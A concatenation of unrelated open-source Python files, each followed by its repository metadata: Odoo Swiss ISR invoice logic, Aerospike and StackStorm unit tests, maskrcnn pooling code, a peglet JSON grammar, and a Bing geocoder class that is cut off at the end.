from odoo.tools.misc import mod10r
l10n_ch_ISR_NUMBER_LENGTH = 27
l10n_ch_ISR_NUMBER_ISSUER_LENGTH = 12
class AccountInvoice(models.Model):
_inherit = 'account.invoice'
l10n_ch_isr_postal = fields.Char(compute='_compute_l10n_ch_isr_postal', help='The postal reference identifying the bank managing this ISR.')
l10n_ch_isr_postal_formatted = fields.Char(compute='_compute_l10n_ch_isr_postal', help="Postal reference of the bank, formated with '-' and without the padding zeros, to generate ISR report.")
l10n_ch_isr_number = fields.Char(compute='_compute_l10n_ch_isr_number', store=True, help='The reference number associated with this invoice')
l10n_ch_isr_number_spaced = fields.Char(compute='_compute_l10n_ch_isr_number', help="ISR number split in blocks of 5 characters (right-justified), to generate ISR report.")
l10n_ch_isr_optical_line = fields.Char(compute="_compute_l10n_ch_isr_optical_line", help='Optical reading line, as it will be printed on ISR')
l10n_ch_isr_valid = fields.Boolean(compute='_compute_l10n_ch_isr_valid', help='Boolean value. True iff all the data required to generate the ISR are present')
l10n_ch_isr_sent = fields.Boolean(defaut=False, help="Boolean value telling whether or not the ISR corresponding to this invoice has already been printed or sent by mail.")
l10n_ch_currency_name = fields.Char(related='currency_id.name', help="The name of this invoice's currency") #This field is used in the "invisible" condition field of the 'Print ISR' button.
@api.depends('partner_bank_id.bank_id.l10n_ch_postal_eur', 'partner_bank_id.bank_id.l10n_ch_postal_chf')
def _compute_l10n_ch_isr_postal(self):
""" Computes the postal reference identifying the bank managing this ISR and formats it accordingly"""
def _format_isr_postal(isr_postal):
#format the isr as per specifications
currency_code = isr_postal[:2]
middle_part = isr_postal[2:-1]
trailing_cipher = isr_postal[-1]
middle_part = re.sub('^0*', '', middle_part)
return currency_code + '-' + middle_part + '-' + trailing_cipher
for record in self:
if record.partner_bank_id and record.partner_bank_id.bank_id:
isr_postal = False
if record.currency_id.name == 'EUR':
isr_postal = record.partner_bank_id.bank_id.l10n_ch_postal_eur
elif record.currency_id.name == 'CHF':
isr_postal = record.partner_bank_id.bank_id.l10n_ch_postal_chf
else:
#we don't format if in another currency as EUR or CHF
continue
if isr_postal:
record.l10n_ch_isr_postal = isr_postal
record.l10n_ch_isr_postal_formatted = _format_isr_postal(isr_postal)
@api.depends('number', 'partner_bank_id.l10n_ch_postal')
def _compute_l10n_ch_isr_number(self):
""" The ISR reference number is 27 characters long. The first 12 of them
contain the postal account number of this ISR's issuer, removing the zeros
at the beginning and filling the empty places with zeros on the right if it is
too short. The 15 other characters contain an internal reference identifying
the invoice. For this, we use the invoice sequence number, removing each
of its non-digit characters, and pad the unused spaces on the left of
this number with zeros.
"""
def _space_isr_number(isr_number):
to_treat = isr_number
res = ''
while to_treat:
res = to_treat[-5:] + res
to_treat = to_treat[:-5]
if to_treat:
res = ' ' + res
return res
for record in self:
if record.number and record.partner_bank_id and record.partner_bank_id.l10n_ch_postal:
invoice_issuer_ref = re.sub('^0*', '', record.partner_bank_id.l10n_ch_postal)
invoice_issuer_ref = invoice_issuer_ref.ljust(l10n_ch_ISR_NUMBER_ISSUER_LENGTH, '0')
invoice_ref = re.sub('[^\d]', '', record.number)
#We only keep the last digits of the sequence number if it is too long
invoice_ref = invoice_ref[-l10n_ch_ISR_NUMBER_ISSUER_LENGTH:]
internal_ref = invoice_ref.zfill(l10n_ch_ISR_NUMBER_LENGTH - l10n_ch_ISR_NUMBER_ISSUER_LENGTH)
record.l10n_ch_isr_number = invoice_issuer_ref + internal_ref
record.l10n_ch_isr_number_spaced = _space_isr_number(record.l10n_ch_isr_number)
@api.depends('currency_id.name', 'amount_total', 'partner_bank_id.bank_id', 'number', 'partner_bank_id.l10n_ch_postal', 'partner_bank_id.bank_id.l10n_ch_postal_eur', 'partner_bank_id.bank_id.l10n_ch_postal_chf')
def _compute_l10n_ch_isr_optical_line(self):
""" The optical reading line of the ISR looks like this :
left>isr_ref+ bank_ref>
Where:
- left is composed of two ciphers indicating the currency (01 for CHF,
03 for EUR), followed by ten characters containing the total of the
invoice (with the dot between units and cents removed, everything being
right-aligned and empty places filled with zeros). After the total,
left contains a last cipher, which is the result of a recursive modulo
10 function ran over the rest of it.
- isr_ref is the ISR reference number
- bank_ref is the full postal bank code (aka clearing number) of the
bank supporting the ISR (including the zeros).
"""
for record in self:
if record.l10n_ch_isr_number and record.l10n_ch_isr_postal and record.currency_id.name:
#Left part
currency_code = None
if record.currency_id.name == 'CHF':
currency_code = '01'
elif record.currency_id.name == 'EUR':
currency_code = '03'
units, cents = float_split_str(record.amount_total, 2)
amount_to_display = units + cents
amount_ref = amount_to_display.zfill(10)
left = currency_code + amount_ref
left = mod10r(left)
#Final assembly (the space after the '+' is no typo, it stands in the specs.)
record.l10n_ch_isr_optical_line = left + '>' + record.l10n_ch_isr_number + '+ ' + record.l10n_ch_isr_postal + '>'
@api.depends('type', 'number', 'partner_bank_id.l10n_ch_postal', 'partner_bank_id.bank_id', 'currency_id.name', 'partner_bank_id.bank_id.l10n_ch_postal_eur', 'partner_bank_id.bank_id.l10n_ch_postal_chf')
def _compute_l10n_ch_isr_valid(self):
"""Returns True if all the data required to generate the ISR are present"""
for record in self:
record.l10n_ch_isr_valid = record.type == 'out_invoice' and\
record.number and \
record.l10n_ch_isr_postal and \
record.partner_bank_id and \
record.partner_bank_id.l10n_ch_postal and \
record.l10n_ch_currency_name in ['EUR', 'CHF']
def split_total_amount(self):
""" Splits the total amount of this invoice in two parts, using the dot as
a separator, and taking two precision digits (always displayed).
These two parts are returned as the two elements of a tuple, as strings
to print in the report.
This function is needed on the model, as it must be called in the report
template, which cannot reference static functions
"""
return float_split_str(self.amount_total, 2)
def isr_print(self):
""" Triggered by the 'Print ISR' button.
"""
self.ensure_one()
if self.l10n_ch_isr_valid:
self.l10n_ch_isr_sent = True
return self.env.ref('l10n_ch.l10n_ch_isr_report').report_action(self)
else:
raise ValidationError(_("""You cannot generate an ISR yet.\n
For this, you need to :\n
- set a valid postal account number (or an IBAN referencing one) for your company\n
- define its bank\n
- associate this bank with a postal reference for the currency used in this invoice\n
- fill the 'bank account' field of the invoice with the postal to be used to receive the related payment. A default account will be automatically set for all invoices created after you defined a postal account for your company."""))
def action_invoice_sent(self):
""" Overridden. Triggered by the 'send by mail' button.
"""
rslt = super(AccountInvoice, self).action_invoice_sent()
if self.l10n_ch_isr_valid:
rslt['context']['l10n_ch_mark_isr_as_sent'] = True
return rslt
|
richard-willowit/odoo
|
addons/l10n_ch/models/account_invoice.py
|
Python
|
gpl-3.0
| 9,277
|
from mpf.tests.MpfTestCase import MpfTestCase
class TestConfigOldVersion(MpfTestCase):
def get_config_file(self):
return 'test_config_interface_missing_version.yaml'
def get_machine_path(self):
return 'tests/machine_files/config_interface/'
def setUp(self):
self.save_and_prepare_sys_path()
def tearDown(self):
self.restore_sys_path()
def test_config_file_with_old_version(self):
self.assertRaises(ValueError, super().setUp)
self.loop.close()
|
missionpinball/mpf
|
mpf/tests/test_ConfigOldVersion.py
|
Python
|
mit
| 517
|
# -*- coding: utf-8 -*-
import pytest
import sys
import random
from .test_base_class import TestBaseClass
from aerospike import exception as e
aerospike = pytest.importorskip("aerospike")
try:
import aerospike
except:
print("Please install aerospike python client.")
sys.exit(1)
class TestListInsertItems(object):
@pytest.fixture(autouse=True)
def setup(self, request, as_connection):
keys = []
for i in range(5):
key = ('test', 'demo', i)
rec = {'name': 'name%s' %
(str(i)), 'age': [i, i + 1], 'city': ['Pune', 'Dehli']}
self.as_connection.put(key, rec)
keys.append(key)
key = ('test', 'demo', 'bytearray_key')
self.as_connection.put(
key, {"bytearray_bin": bytearray("asd;as[d'as;d", "utf-8")})
keys.append(key)
def teardown():
"""
Teardown method.
"""
for key in keys:
try:
as_connection.remove(key)
except e.RecordNotFound:
pass
request.addfinalizer(teardown)
@pytest.mark.parametrize("key, field, index, value, expected", [
(('test', 'demo', 1), # list of integers
"age",
0,
[500, 1500, 3000],
{'age': [500, 1500, 3000, 1, 2],
'name': 'name1', 'city': ['Pune', 'Dehli']}),
(('test', 'demo', 1), # list of string
"city",
0,
["Chennai"],
{'age': [1, 2], 'name': 'name1',
'city': ['Chennai', 'Pune', 'Dehli']}),
(('test', 'demo', 1), # list of unicode string
"city",
3,
[u"Mumbai"],
{'age': [1, 2], 'city': ['Pune', 'Dehli', None,
u'Mumbai'], 'name': 'name1'}),
(('test', 'demo', 2), # list of float
"age",
7,
[85.12],
{'age': [2, 3, None, None, None, None, None, 85.12],
'city': ['Pune', 'Dehli'], 'name': 'name2'}),
(('test', 'demo', 3), # list of map
"age",
1,
[{'k1': 29}],
{'age': [3, {'k1': 29}, 4], 'city': ['Pune', 'Dehli'],
'name': 'name3'}),
(('test', 'demo', 1), # list of bytearray
"age",
2,
[555, bytearray("asd;as[d'as;d", "utf-8")],
{'age': [1, 2, 555, bytearray(b"asd;as[d\'as;d")],
'city': ['Pune', 'Dehli'], 'name': 'name1'}),
])
def test_pos_list_insert_items(self, key, field, index, value, expected):
"""
Invoke list_insert_items() inserts items
"""
self.as_connection.list_insert_items(
key, field, index, value)
(key, _, bins) = self.as_connection.get(key)
assert bins == expected
def test_pos_list_insert_items_list_with_correct_policy(self):
"""
Invoke list_insert_items() inserts list with correct policy
"""
key = ('test', 'demo', 2)
policy = {
'timeout': 1000,
'retry': aerospike.POLICY_RETRY_ONCE,
'commit_level': aerospike.POLICY_COMMIT_LEVEL_MASTER
}
self.as_connection.list_insert_items(
key, "age", 5, [45, 50, 80], {}, policy)
(key, _, bins) = self.as_connection.get(key)
assert bins == {'age': [2, 3, None, None, None, 45, 50, 80], 'city': [
'Pune', 'Dehli'], 'name': 'name2'}
def test_pos_list_insert_items_boolean(self):
"""
Invoke list_insert_items() insert boolean into the list
"""
key1 = ('test', 'demo', 1)
self.as_connection.list_insert_items(key1, "age", 1, [False])
(_, _, b1) = self.as_connection.get(key1)
key2 = ('test', 'demo', 2)
self.as_connection.list_insert_items(
key2, "age", 1, [False, True])
(_, _, b2) = self.as_connection.get(key2)
assert b1['age'] == [1, False, 2]
assert b2['age'] == [2, False, True, 3]
def test_pos_list_insert_items_with_nonexistent_key(self):
"""
Invoke list_insert_items() with non-existent key
"""
charSet = 'abcdefghijklmnopqrstuvwxyz1234567890'
minLength = 5
maxLength = 30
length = random.randint(minLength, maxLength)
key = ('test', 'demo', ''.join(map(lambda unused:
random.choice(charSet),
range(length))) + ".com")
status = self.as_connection.list_insert_items(key, "abc", 2,
[122, 878])
assert status == 0
(key, _, bins) = self.as_connection.get(key)
assert status == 0
assert bins == {'abc': [None, None, 122, 878]}
self.as_connection.remove(key)
def test_pos_list_insert_items_with_nonexistent_bin(self):
"""
Invoke list_insert_items() with non-existent bin
"""
key = ('test', 'demo', 1)
charSet = 'abcdefghijklmnopqrstuvwxyz1234567890'
minLength = 5
maxLength = 10
length = random.randint(minLength, maxLength)
bin = ''.join(map(lambda unused:
random.choice(charSet), range(length))) + ".com"
status = self.as_connection.list_insert_items(
key, bin, 1, [585, 789])
assert status == 0
(key, _, bins) = self.as_connection.get(key)
assert status == 0
assert bins == {'age': [1, 2], 'name': 'name1',
'city': ['Pune', 'Dehli'], bin: [None, 585, 789]}
# Negative Tests
def test_neg_list_insert_items_with_no_parameters(self):
"""
Invoke list_insert_items() without any mandatory parameters.
"""
with pytest.raises(TypeError) as typeError:
self.as_connection.list_insert_items()
assert "argument 'key' (pos 1)" in str(
typeError.value)
def test_neg_list_insert_items_with_incorrect_policy(self):
"""
Invoke list_insert_items() with incorrect policy
"""
key = ('test', 'demo', 1)
policy = {
'timeout': 0.5
}
try:
self.as_connection.list_insert_items(
key, "age", 6, ["str"], {}, policy)
except e.ParamError as exception:
assert exception.code == -2
assert exception.msg == "timeout is invalid"
def test_neg_list_insert_items_with_extra_parameter(self):
"""
Invoke list_insert_items() with extra parameter.
"""
key = ('test', 'demo', 1)
policy = {'timeout': 1000}
with pytest.raises(TypeError) as typeError:
self.as_connection.list_insert_items(
key, "age", 3, [999], {}, policy, "")
assert "list_insert_items() takes at most 6 arguments (7 given)" \
in str(typeError.value)
def test_neg_ist_insert_items_policy_is_string(self):
"""
Invoke list_insert_items() with policy is string
"""
key = ('test', 'demo', 1)
try:
self.as_connection.list_insert_items(
key, "age", 1, [85], {}, "")
except e.ParamError as exception:
assert exception.code == -2
assert exception.msg == "policy must be a dict"
def test_neg_list_insert_items_key_is_none(self):
"""
Invoke list_insert_items() with key is none
"""
try:
self.as_connection.list_insert_items(None, "age", 1, [45])
except e.ParamError as exception:
assert exception.code == -2
assert exception.msg == "key is invalid"
def test_neg_list_insert_items_bin_is_none(self):
"""
Invoke list_insert_items() with bin is none
"""
key = ('test', 'demo', 1)
try:
self.as_connection.list_insert_items(key, None, 2, ["str"])
except e.ParamError as exception:
assert exception.code == -2
assert exception.msg == "Bin name should be of type string"
def test_neg_list_insert_items_with_items_type_string(self):
"""
Invoke list_insert_items() insert items is of type string
"""
key = ('test', 'demo', 1)
try:
self.as_connection.list_insert_items(key, "age", 6, "abc")
except e.ParamError as exception:
assert exception.code == -2
assert exception.msg == "Items should be of type list"
def test_neg_list_insert_items_meta_type_integer(self):
"""
Invoke list_insert_items() with metadata input is of type integer
"""
key = ('test', 'demo', 1)
try:
self.as_connection.list_insert_items(key, "contact_no", 0,
[85], 888)
except e.ParamError as exception:
assert exception.code == -2
assert exception.msg == "Metadata should be of type dictionary"
def test_neg_list_insert_items_index_type_string(self):
"""
Invoke list_insert_items() insert with index is of type string
"""
key = ('test', 'demo', 1)
with pytest.raises(TypeError) as typeError:
self.as_connection.list_insert_items(
key, "age", "Fifth", [False])
assert "an integer is required" in str(typeError.value)
|
aerospike/aerospike-client-python
|
test/new_tests/test_list_insert_items.py
|
Python
|
apache-2.0
| 9,572
|
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
'''Constant definitions for GRIT.
'''
from __future__ import print_function
# This is the Icelandic noun meaning "grit" and is used to check that our
# input files are in the correct encoding. The middle character gets encoded
# as two bytes in UTF-8, so this is sufficient to detect incorrect encoding.
ENCODING_CHECK = u'm\u00f6l'
# A special language, translations into which are always "TTTTTT".
CONSTANT_LANGUAGE = 'x_constant'
FAKE_BIDI = 'fake-bidi'
# Magic number added to the header of resources brotli compressed by grit. Used
# to easily identify resources as being brotli compressed. See
# ui/base/resource/resource_bundle.h for decompression usage.
BROTLI_CONST = b'\x1e\x9b'
|
endlessm/chromium-browser
|
tools/grit/grit/constants.py
|
Python
|
bsd-3-clause
| 862
|
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved.
# Copyright (c) 2018-2019 NVIDIA CORPORATION. All rights reserved.
import torch
import torch.nn.functional as F
from torch import nn
from maskrcnn_benchmark.layers import ROIAlign
from .utils import cat
class LevelMapper(object):
"""Determine which FPN level each RoI in a set of RoIs should map to based
on the heuristic in the FPN paper.
"""
def __init__(self, k_min, k_max, canonical_scale=224, canonical_level=4, eps=1e-6):
"""
Arguments:
k_min (int)
k_max (int)
canonical_scale (int)
canonical_level (int)
eps (float)
"""
self.k_min = k_min
self.k_max = k_max
self.s0 = canonical_scale
self.lvl0 = canonical_level
self.eps = eps
def __call__(self, boxlists):
"""
Arguments:
boxlists (list[BoxList])
"""
# Compute level ids
s = torch.sqrt(cat([boxlist.area() for boxlist in boxlists]))
# Eqn.(1) in FPN paper
target_lvls = torch.floor(self.lvl0 + torch.log2(s / self.s0 + self.eps))
target_lvls = torch.clamp(target_lvls, min=self.k_min, max=self.k_max)
return target_lvls.to(torch.int64) - self.k_min
class Pooler(nn.Module):
"""
Pooler for Detection with or without FPN.
It currently hard-code ROIAlign in the implementation,
but that can be made more generic later on.
Also, the requirement of passing the scales is not strictly necessary, as they
can be inferred from the size of the feature map / size of original image,
which is available thanks to the BoxList.
"""
def __init__(self, output_size, scales, sampling_ratio):
"""
Arguments:
output_size (list[tuple[int]] or list[int]): output size for the pooled region
scales (list[float]): scales for each Pooler
sampling_ratio (int): sampling ratio for ROIAlign
"""
super(Pooler, self).__init__()
poolers = []
for scale in scales:
poolers.append(
ROIAlign(
output_size, spatial_scale=scale, sampling_ratio=sampling_ratio
)
)
self.poolers = nn.ModuleList(poolers)
self.output_size = output_size
# get the levels in the feature map by leveraging the fact that the network always
# downsamples by a factor of 2 at each level.
lvl_min = -torch.log2(torch.tensor(scales[0], dtype=torch.float32)).item()
lvl_max = -torch.log2(torch.tensor(scales[-1], dtype=torch.float32)).item()
self.map_levels = LevelMapper(lvl_min, lvl_max)
def convert_to_roi_format(self, boxes):
concat_boxes = cat([b.bbox for b in boxes], dim=0)
device, dtype = concat_boxes.device, concat_boxes.dtype
ids = cat(
[
torch.full((len(b), 1), i, dtype=dtype, device=device)
for i, b in enumerate(boxes)
],
dim=0,
)
rois = torch.cat([ids, concat_boxes], dim=1)
return rois
def forward(self, x, boxes):
"""
Arguments:
x (list[Tensor]): feature maps for each level
boxes (list[BoxList]): boxes to be used to perform the pooling operation.
Returns:
result (Tensor)
"""
num_levels = len(self.poolers)
rois = self.convert_to_roi_format(boxes)
if num_levels == 1:
return self.poolers[0](x[0], rois)
levels = self.map_levels(boxes)
num_rois = len(rois)
num_channels = x[0].shape[1]
output_size = self.output_size[0]
dtype, device = x[0].dtype, x[0].device
result = torch.zeros(
(num_rois, num_channels, output_size, output_size),
dtype=dtype,
device=device,
)
for level, (per_level_feature, pooler) in enumerate(zip(x, self.poolers)):
idx_in_level = torch.nonzero(levels == level).squeeze(1)
rois_per_level = rois[idx_in_level]
result[idx_in_level] = pooler(per_level_feature, rois_per_level).to(dtype)
return result
|
mlperf/training_results_v0.6
|
NVIDIA/benchmarks/maskrcnn/implementations/pytorch/maskrcnn_benchmark/modeling/poolers.py
|
Python
|
apache-2.0
| 4,272
|
#!/usr/bin/env python3
import sys
from pprint import pprint
import sys; print(sys.executable)
def show(obj):
'''Show the dump of the properties of the object.'''
pprint(vars(obj))
if sys.flags.interactive:
from app import *
print('Loading Flask App in console mode. Use show(<obj)> to introspect.')
elif __name__ == '__main__':
from app import app
app.debug = True
app.run(host="0.0.0.0", port=8080)
|
DamnedFacts/flask-boilerplate
|
runserver.py
|
Python
|
bsd-3-clause
| 432
|
# Copyright 2010 Curtis McEnroe <programble@gmail.com>
# Licensed under the GNU GPLv3
class Scope:
def __init__(self, parent=None):
self.bindings = {}
self.parent = parent
def __getitem__(self, key):
# If bound in this scope, return that
if self.bindings.has_key(key):
return self.bindings[key]
# Otherwise, look for it in the parent scope
elif self.parent:
return self.parent[key]
# If we have no parent, key is not bound at all
else:
raise NameError("name '%s' is not bound" % key)
def __setitem__(self, key, value):
# Will shadow any bindings in the parent scope
self.bindings[key] = value
def __delitem__(self, key):
del(self.bindings[key])
def __repr__(self):
# For debugging...
if self.parent:
return repr(self.parent) + '\n' + repr(self.bindings)
else:
return repr(self.bindings)
def has_key(self, key):
return self.bindings.has_key(key)
|
magomsk/lispy
|
scope.py
|
Python
|
isc
| 1,055
|
"""
Example: parse JSON.
"""
from peglet import Parser, hug, join, attempt
literals = dict(true=True,
false=False,
null=None)
mk_literal = literals.get
mk_object = lambda *pairs: dict(pairs)
escape = lambda s: s.decode('unicode-escape')
mk_number = float
# Following http://www.json.org/
json_parse = Parser(r"""
start = _ value
object = { _ members } _ mk_object
| { _ } _ mk_object
members = pair , _ members
| pair
pair = string : _ value hug
array = \[ _ elements \] _ hug
| \[ _ \] _ hug
elements = value , _ elements
| value
value = string | number
| object | array
| (true|false|null)\b _ mk_literal
string = " chars " _ join
chars = char chars
|
char = ([^\x00-\x1f"\\])
| \\(["/\\])
| (\\[bfnrt]) escape
| (\\u) xd xd xd xd join escape
xd = ([0-9a-fA-F])
number = int frac exp _ join mk_number
| int frac _ join mk_number
| int exp _ join mk_number
| int _ join mk_number
int = (-?) (0) !\d
| (-?) ([1-9]\d*)
frac = ([.]\d+)
exp = ([eE][+-]?\d+)
_ = \s*
""", **globals())
# XXX The spec says "whitespace may be inserted between any pair of
# tokens, but leaves open just what's a token. So is the '-' in '-1' a
# token? Should I allow whitespace there?
## json_parse('[1,1]')
#. ((1.0, 1.0),)
## json_parse('true')
#. (True,)
## json_parse(r'"hey \b\n \u01ab o hai"')
#. (u'hey \x08\n \u01ab o hai',)
## json_parse('{"hey": true}')
#. ({'hey': True},)
## json_parse('[{"hey": true}]')
#. (({'hey': True},),)
## json_parse('[{"hey": true}, [-12.34]]')
#. (({'hey': True}, (-12.34,)),)
## json_parse('0')
#. (0.0,)
## json_parse('0.125e-2')
#. (0.00125,)
## attempt(json_parse, '0377')
## attempt(json_parse, '{"hi"]')
# Udacity CS212 problem 3.1:
## json_parse('["testing", 1, 2, 3]')
#. (('testing', 1.0, 2.0, 3.0),)
## json_parse('-123.456e+789')
#. (-inf,)
## json_parse('{"age": 21, "state":"CO","occupation":"rides the rodeo"}')
#. ({'age': 21.0, 'state': 'CO', 'occupation': 'rides the rodeo'},)
|
JaDogg/__py_playground
|
reference/peglet/examples/json.py
|
Python
|
mit
| 2,243
|
# Licensed to the StackStorm, Inc ('StackStorm') under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest2
from st2common import operators
from st2common.util import date as date_utils
class OperatorTest(unittest2.TestCase):
def test_matchwildcard(self):
op = operators.get_operator('matchwildcard')
self.assertTrue(op('v1', 'v1'), 'Failed matchwildcard.')
self.assertFalse(op('test foo test', 'foo'), 'Failed matchwildcard.')
self.assertTrue(op('test foo test', '*foo*'), 'Failed matchwildcard.')
self.assertTrue(op('bar', 'b*r'), 'Failed matchwildcard.')
self.assertTrue(op('bar', 'b?r'), 'Failed matchwildcard.')
def test_matchregex(self):
op = operators.get_operator('matchregex')
self.assertTrue(op('v1', 'v1$'), 'Failed matchregex.')
# Multi line string, make sure re.DOTALL is used
string = '''ponies
moar
foo
bar
yeah!
'''
self.assertTrue(op(string, '.*bar.*'), 'Failed matchregex.')
string = 'foo\r\nponies\nbar\nfooooo'
self.assertTrue(op(string, '.*ponies.*'), 'Failed matchregex.')
def test_matchregex_case_variants(self):
op = operators.get_operator('MATCHREGEX')
self.assertTrue(op('v1', 'v1$'), 'Failed matchregex.')
op = operators.get_operator('MATCHregex')
self.assertTrue(op('v1', 'v1$'), 'Failed matchregex.')
def test_matchregex_fail(self):
op = operators.get_operator('matchregex')
self.assertFalse(op('v1_foo', 'v1$'), 'Passed matchregex.')
def test_equals_numeric(self):
op = operators.get_operator('equals')
self.assertTrue(op(1, 1), 'Failed equals.')
def test_equals_string(self):
op = operators.get_operator('equals')
self.assertTrue(op('1', '1'), 'Failed equals.')
self.assertTrue(op('', ''), 'Failed equals.')
def test_equals_fail(self):
op = operators.get_operator('equals')
self.assertFalse(op('1', '2'), 'Passed equals.')
def test_nequals(self):
op = operators.get_operator('nequals')
self.assertTrue(op('foo', 'bar'))
self.assertTrue(op('foo', 'foo1'))
self.assertTrue(op('foo', 'FOO'))
self.assertTrue(op('True', True))
self.assertTrue(op('None', None))
self.assertFalse(op('True', 'True'))
self.assertFalse(op(None, None))
def test_iequals(self):
op = operators.get_operator('iequals')
self.assertTrue(op('ABC', 'ABC'), 'Failed iequals.')
self.assertTrue(op('ABC', 'abc'), 'Failed iequals.')
self.assertTrue(op('AbC', 'aBc'), 'Failed iequals.')
def test_iequals_fail(self):
op = operators.get_operator('iequals')
self.assertFalse(op('ABC', 'BCA'), 'Failed iequals.')
def test_contains(self):
op = operators.get_operator('contains')
self.assertTrue(op('hasystack needle haystack', 'needle'))
self.assertTrue(op('needle', 'needle'))
self.assertTrue(op('needlehaystack', 'needle'))
self.assertTrue(op('needle haystack', 'needle'))
self.assertTrue(op('haystackneedle', 'needle'))
self.assertTrue(op('haystack needle', 'needle'))
def test_contains_fail(self):
op = operators.get_operator('contains')
self.assertFalse(op('hasystack needl haystack', 'needle'))
self.assertFalse(op('needla', 'needle'))
def test_icontains(self):
op = operators.get_operator('icontains')
self.assertTrue(op('hasystack nEEdle haystack', 'needle'))
self.assertTrue(op('neeDle', 'NeedlE'))
self.assertTrue(op('needlehaystack', 'needle'))
self.assertTrue(op('NEEDLE haystack', 'NEEDLE'))
self.assertTrue(op('haystackNEEDLE', 'needle'))
self.assertTrue(op('haystack needle', 'NEEDLE'))
def test_icontains_fail(self):
op = operators.get_operator('icontains')
self.assertFalse(op('hasystack needl haystack', 'needle'))
self.assertFalse(op('needla', 'needle'))
def test_ncontains(self):
op = operators.get_operator('ncontains')
self.assertTrue(op('hasystack needle haystack', 'foo'))
self.assertTrue(op('needle', 'foo'))
self.assertTrue(op('needlehaystack', 'needlex'))
self.assertTrue(op('needle haystack', 'needlex'))
self.assertTrue(op('haystackneedle', 'needlex'))
self.assertTrue(op('haystack needle', 'needlex'))
def test_ncontains_fail(self):
op = operators.get_operator('ncontains')
self.assertFalse(op('hasystack needle haystack', 'needle'))
self.assertFalse(op('needla', 'needla'))
def test_incontains(self):
op = operators.get_operator('incontains')
self.assertTrue(op('hasystack needle haystack', 'FOO'))
self.assertTrue(op('needle', 'FOO'))
self.assertTrue(op('needlehaystack', 'needlex'))
self.assertTrue(op('needle haystack', 'needlex'))
self.assertTrue(op('haystackneedle', 'needlex'))
self.assertTrue(op('haystack needle', 'needlex'))
def test_incontains_fail(self):
op = operators.get_operator('incontains')
self.assertFalse(op('hasystack needle haystack', 'nEeDle'))
self.assertFalse(op('needlA', 'needlA'))
def test_startswith(self):
op = operators.get_operator('startswith')
self.assertTrue(op('hasystack needle haystack', 'hasystack'))
self.assertTrue(op('a hasystack needle haystack', 'a '))
def test_startswith_fail(self):
op = operators.get_operator('startswith')
self.assertFalse(op('hasystack needle haystack', 'needle'))
self.assertFalse(op('a hasystack needle haystack', 'haystack'))
def test_istartswith(self):
op = operators.get_operator('istartswith')
self.assertTrue(op('haystack needle haystack', 'HAYstack'))
self.assertTrue(op('HAYSTACK needle haystack', 'haystack'))
def test_istartswith_fail(self):
op = operators.get_operator('istartswith')
self.assertFalse(op('hasystack needle haystack', 'NEEDLE'))
self.assertFalse(op('a hasystack needle haystack', 'haystack'))
def test_endswith(self):
op = operators.get_operator('endswith')
self.assertTrue(op('hasystack needle haystackend', 'haystackend'))
self.assertTrue(op('a hasystack needle haystack b', 'b'))
def test_endswith_fail(self):
op = operators.get_operator('endswith')
self.assertFalse(op('hasystack needle haystackend', 'haystack'))
self.assertFalse(op('a hasystack needle haystack', 'a'))
def test_iendswith(self):
op = operators.get_operator('iendswith')
self.assertTrue(op('haystack needle haystackEND', 'HAYstackend'))
self.assertTrue(op('HAYSTACK needle haystackend', 'haystackEND'))
def test_iendswith_fail(self):
op = operators.get_operator('iendswith')
self.assertFalse(op('hasystack needle haystack', 'NEEDLE'))
self.assertFalse(op('a hasystack needle haystack', 'a '))
def test_lt(self):
op = operators.get_operator('lessthan')
self.assertTrue(op(1, 2), 'Failed lessthan.')
def test_lt_char(self):
op = operators.get_operator('lessthan')
self.assertTrue(op('a', 'b'), 'Failed lessthan.')
def test_lt_fail(self):
op = operators.get_operator('lessthan')
self.assertFalse(op(1, 1), 'Passed lessthan.')
def test_gt(self):
op = operators.get_operator('greaterthan')
self.assertTrue(op(2, 1), 'Failed greaterthan.')
def test_gt_str(self):
op = operators.get_operator('lessthan')
self.assertTrue(op('aba', 'bcb'), 'Failed greaterthan.')
def test_gt_fail(self):
op = operators.get_operator('greaterthan')
self.assertFalse(op(2, 3), 'Passed greaterthan.')
def test_timediff_lt(self):
op = operators.get_operator('timediff_lt')
self.assertTrue(op(date_utils.get_datetime_utc_now().isoformat(), 10),
'Failed test_timediff_lt.')
def test_timediff_lt_fail(self):
op = operators.get_operator('timediff_lt')
self.assertFalse(op('2014-07-01T00:01:01.000000', 10),
'Passed test_timediff_lt.')
def test_timediff_gt(self):
op = operators.get_operator('timediff_gt')
self.assertTrue(op('2014-07-01T00:01:01.000000', 1),
'Failed test_timediff_gt.')
def test_timediff_gt_fail(self):
op = operators.get_operator('timediff_gt')
self.assertFalse(op(date_utils.get_datetime_utc_now().isoformat(), 10),
'Passed test_timediff_gt.')
def test_exists(self):
op = operators.get_operator('exists')
self.assertTrue(op(False, None), 'Should return True')
self.assertTrue(op(1, None), 'Should return True')
self.assertTrue(op('foo', None), 'Should return True')
self.assertFalse(op(None, None), 'Should return False')
def test_nexists(self):
op = operators.get_operator('nexists')
self.assertFalse(op(False, None), 'Should return False')
self.assertFalse(op(1, None), 'Should return False')
self.assertFalse(op('foo', None), 'Should return False')
self.assertTrue(op(None, None), 'Should return True')
|
dennybaa/st2
|
st2common/tests/unit/test_operators.py
|
Python
|
apache-2.0
| 10,068
|
#!/usr/bin/python
# coding: utf8
from __future__ import absolute_import
from geocoder.base import Base
from geocoder.keys import bing_key
import re
class Bing(Base):
"""
Bing Maps REST Services
=======================
The Bing™ Maps REST Services Application Programming Interface (API)
provides a Representational State Transfer (REST) interface to
perform tasks such as creating a static map with pushpins, geocoding
an address, retrieving imagery metadata, or creating a route.
API Reference
-------------
http://msdn.microsoft.com/en-us/library/ff701714.aspx
Get Bing key
------------
https://www.bingmapsportal.com/
"""
provider = 'bing'
method = 'geocode'
def __init__(self, location, **kwargs):
self.url = 'http://dev.virtualearth.net/REST/v1/Locations'
self.location = location
self.headers = {
'Referer': "http://addxy.com/",
'User-agent': 'Mozilla/5.0'
}
self.params = {
'q': location,
